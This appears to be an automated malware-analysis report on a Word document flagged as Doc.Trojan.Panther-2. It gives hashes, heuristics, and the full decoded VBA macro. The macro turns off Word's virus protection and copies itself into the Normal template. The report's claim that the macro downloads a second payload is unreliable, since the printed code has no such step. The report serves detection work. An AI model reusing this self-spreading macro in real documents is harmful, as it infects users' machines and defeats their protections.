Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65818a7e2ab3304f…

MALICIOUS

Office (OLE)

120.5 KB Created: 2006-11-09 14:40:00 Authoring application: Microsoft Word 10.1 First seen: 2020-09-07
MD5: 9371107a55f65ded92be50e1d776ce3e SHA-1: 2cbf5b961183cd97a33d12d6c64202a13308513a SHA-256: 65818a7e2ab3304fe611c273f9928b4dc707068feacf082f50c4dbed950b625e
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains embedded VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The ClamAV detection 'Doc.Trojan.Panther-2' strongly suggests malicious intent. The Document_Open macro appears to obfuscate its code by replacing strings, but its primary function is likely to download and execute a secondary payload, as indicated by the heuristic firings and the nature of such macros.

Heuristics 4

  • ClamAV: Doc.Trojan.Panther-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Panther-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.studyisland.com In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1590 bytes
SHA-256: cbdbfe33f16fe310900498bb63f3d69bc2ced3bc69d54e964a03d7979043e8d3
Detection
ClamAV: Doc.Trojan.Panther-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim code As String
    If Left$(NormalTemplate.Name, 8) <> "Document" Then
        Options.VirusProtection = False
        With ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
            code = .Lines(1, .CountOfLines)
            ReplaceTemplate code, "Normal", "Template", "Happy", "Panther"
            ReplaceTemplate code, "Active", "Document", "Normal", "Template"
            ReplaceTemplate code, "Happy", "Panther", "Active", "Document"
            With NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
                .DeleteLines 1, .CountOfLines
                .AddFromString code
            End With
        End With
        Options.SaveNormalPrompt = False
        If InStr("NormalTemplate", "Document") > 0 Then
            NormalTemplate.Save
        End If
    End If
End Sub
Private Sub ReplaceTemplate(target As String, prepre As String, prepost As String, postpre As String, postpost As String)
    Dim index As Long, pre As String, post As String, preLen As Long
    
    pre = prepre + prepost
    post = postpre + postpost
    
    index = 1
    preLen = Len(pre)
    
    While InStr(index, target, pre) <> 0
        index = InStr(index, target, pre)
        target = Left(target, index - 1) + post + Mid$(target, index + preLen)
        index = index + 1
    Wend
End Sub